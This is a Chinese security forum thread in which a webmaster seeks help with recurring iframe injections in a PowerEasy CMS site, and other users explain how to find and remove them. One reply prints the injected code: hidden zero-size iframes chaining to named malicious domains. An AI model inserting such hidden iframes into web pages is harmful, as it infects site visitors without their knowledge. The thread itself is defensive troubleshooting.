瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 我的网站被挂马了,但360、KV2008和卡卡均无法查杀

12   1  /  2  页   跳转

[求助] 我的网站被挂马了,但360、KV2008和卡卡均无法查杀

我的网站被挂马了,但360、KV2008和卡卡均无法查杀

我的网站程序是:PowerEasy® SiteWeaver™ CMS 6.6 Build 0718

我的网站被挂马了,我在服务器上安装了360、KV2008和卡,并进行全面查杀,但都一无所获。360还开通了ARP拦截功能。打开网站首页,经常出现:http://wnhengji.cn/1.htm(这个网页地址常被添加到网站的JS文件中),http://jzm015.cn/fx.htm还有一些可疑网址在浏览器状态栏一闪而过。

在动易论坛里问了,管理员回复说,动易的程序经过测试,没有漏洞。网站程序没有漏洞,服务器可能就有问题了,我的服务器是Windows2003,技术人员尽力了,重新进行了安全设置,用360、KV2008和卡卡都查了,但均没有发现木马程序,不知木马是怎么挂到网页的。

经与服务商技术人员联系,他们尽管想办法拦截,但最多过一、二天,网站又被挂马了。请高手们帮帮忙。

如图:

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MAXTHON 2.0)
分享到:
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

瑞星技术人员在吗?怎么查杀此木马??
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

汗一个先,不知道你的数据库文件名是否安全。

要不楼主可以使用System Repair Engineer扫描日志作为附件上传
下载页面:http://www.kztechs.com/sreng/download.html
操作方法:
1、下载后解压缩,运行SREngPS.EXE;
2、如果无法打开尝试把SREngPS.EXE改名为123.com,并复制到c:\windows目录下运行;
3、依次点击【智能扫描】-【扫描】,耐心等待,扫描结束后点击【保存报告】;
4、选择保存路径,文件名保持默认,直接点击【保存】;
5、将日志文件SREngLOG.log作为附件上传,同时务必详细描述问题现象,如果有查杀不净的病毒务必提供病毒名和路径。
注意:扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等应用程序。
总是这样,来一次,一次离开,曾经灌注了心血的地方,从那刻开始变得那么陌生。
昔日的吵吵闹闹,渐渐的退出视野,那些熟悉的人们,在各处,各自生活。
而这里,成为了“痕迹”。
多少年过去,不知又能留下多少的“痕迹”?
来来去去,最后还不只是剩下了回忆么?


Copyright © https://blog.axiaoke.cn All Rights Reserved.
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

打开网站:出现
http://wnhengji.cn/1.htm 页面.

http://wnhengji.cn/1.htm 源码:
<iframe src=http://www.pdh001.cn/b11.htm width=50 height=0 border=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1891483.js"></script>


http://www.pdh001.cn/b11.htm
源码:
<Iframe src="http://user1.jzm016.cn/a11/fxx.htm" width=100 height=0></iframe>
<Iframe src="http://jzm015.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="http://jzm015.cn/ac.htm" width=100 height=0></iframe>
<Script language="javascript" type="text/javascript" src="http://js.users.51.la/1936348.js"></script>

以下三个网页含有木马程序
http://user1.jzm016.cn/a11/fxx.htm
http://jzm015.cn/fx.htm
http://jzm015.cn/ac.htm

木马就是这样一层一层嵌进去的.
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

瑞星技术人员呢??论坛里有没有高手??
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

页面通过IFRAME嵌入病毒页,无非是为了让浏览你的网站的机器中毒.
而要更改你的原始页面,只能是服务器出问题了.
即使是你的网站出现了漏洞,让别人拿到了你的管理员帐号,无非就是改一下上传附件限制,然后上传一些可执行的病毒,然后等着病毒在服务器上运行.或是一些带毒图片
而如果只是在插入的数据中(如留言)嵌入iframe或script之类的元素,现在的论坛应该多半会给过滤掉(不全是)

顺便说一句,如果在服务器上查杀你站点目录,像asp,php,js,html这样的文本文件中嵌入的链接是不会被查出来的,因为这属于正常的HTML语言.
杀毒?还是挂到别的机器上效果好啊!
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

正好头两天我清理了一个被黑的站点,可以和你分享下经验.
简介:这是个ASP的站点,是承建的公司拿人家现成的代码堆起来的,里面包括论坛,新闻发布,商城,留言本,上传管理,简历管理等等,而每一个功能模块都有一个单独的access数据库.

拿到这份代码的时候,我先给瑞星升级到最新,然后完全查杀这个目录,不过只查到几个病毒(可能是客户自己杀过),其中有一个EXE程序,还有两个压缩包带毒.而这几个文件都在upload目录下,看来这里很可能是病根.
查看图片文件,有些已经打不开了,而有的则只能显示部分画面,应该是被病改写过.(熊猫烧香?)
打开default.asp文件,发现里面有iframe嵌套,看连接的网址不正常,width和height属性都设置成0,不正常,机器打开网站后中毒,应该就是这里的问题。那么下一步的工作就是把这些东西清理出去了。

病毒很狡猾。1、不是每个页面都有iframe;2、iframe插入的位置不固定,有的在前面,有的在后面,而有的则在许多空行后出现(在我用记事本查找的时候,就没发现这种);3、链接的站点不一样,增加了查找的工作量;4、iframe的大小写不一样,如果有的是iframe,有的是IFRAME,有的则是IfRaMe。

站点下面有几千个页面,挨个看肯定不现实,用查找替换是个不错的方法。下面说几种查找替换的方法。
1、windows的搜索功能,选择“所有文件和文件夹”,在第二栏“文件中的一个字或词组”中输入找到的恶意网站地址,再在下面选择站点目录,然后搜索。这个方法能找到“部分”包含恶意代码的文件。这个方法不好的地方就是不能查出全部符合条件的,而且要挨个打开文件进行修改。2、使用Dreameweaver的查找替换功能。利用这个软件可以直接替换掉恶意代码,但也有不足,我的机器是酷睿双核1点几个G的,1G内存,站点下大概有8000+文件,查一会DW会报告内存不足,然后DW就死在那了。3、利用VS。我的版本是VS2005,这个虽然不能去编辑ASP文件(VS对语法要求太严格,改别人写的网页代码,错误提示会把人给烦死)。这个我就不多说了,反正利用这个替换是又快又准。

需要注意的地方:首先通过确认的恶意链接进行替换(不要区分大小写,也不要只在当前文档中查,要查整个目录、站点、项目),包括iframe标签;然后再查找"iframe",这样能够避免不使恶意链接漏掉,也不会误删掉正常的iframe;最后再仔细检查下网站,看病毒有没有以别的方式修改站点。

清理完站点后,修补漏洞也是非常重要的。而我所修改的这个站,光后台管理就有N多个,安全性大幅降低;其次,游客留言时没有“验证码”验证,导至恶意留言,论坛是有,但验证没有采用图片的形式,数字非常容易绕过去。站点留言本在几天之内被插入大量垃圾信息,所记录IP地址是不一样的,看来如果想通过IP是否相同来验证的方法是不合适的。经过清理留言本,以前600+M的站点,变成了现在的40M。

后面需要做的,也是最需要时间的,就是整合数据库,统一登录管理。
杀毒?还是挂到别的机器上效果好啊!
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

我的网站经常被人在JS文档中插入木马程序代码,而且不固定在某个文件,以前找到删除了木马程序代码,但现在,木马程序代码好像被加密了,出现一些看似杂乱的数字和英文字母,给查找和删除增加了麻烦.

请问,有没有什么办法阻止别人在JS文档中增加恶意代码?

注:现在将JS文档全部设置为只读,连我本人都无法修改JS文档,但那个木马程序文件还是能写入JS文档,我真不知道木马程序代码是怎么加进去的?
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

另,我的网站是动易最新版程序,问了动易管理员,说网站程序没有漏洞.
gototop
 

回复:我的网站被挂马了,但360、KV2008和卡卡均无法查杀

木马程序代码只是添加在我放置广告代码的JS文档中,如果我的广告代码不用JS文档调用,会不会阻绝别人恶意添加木马程序代码
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT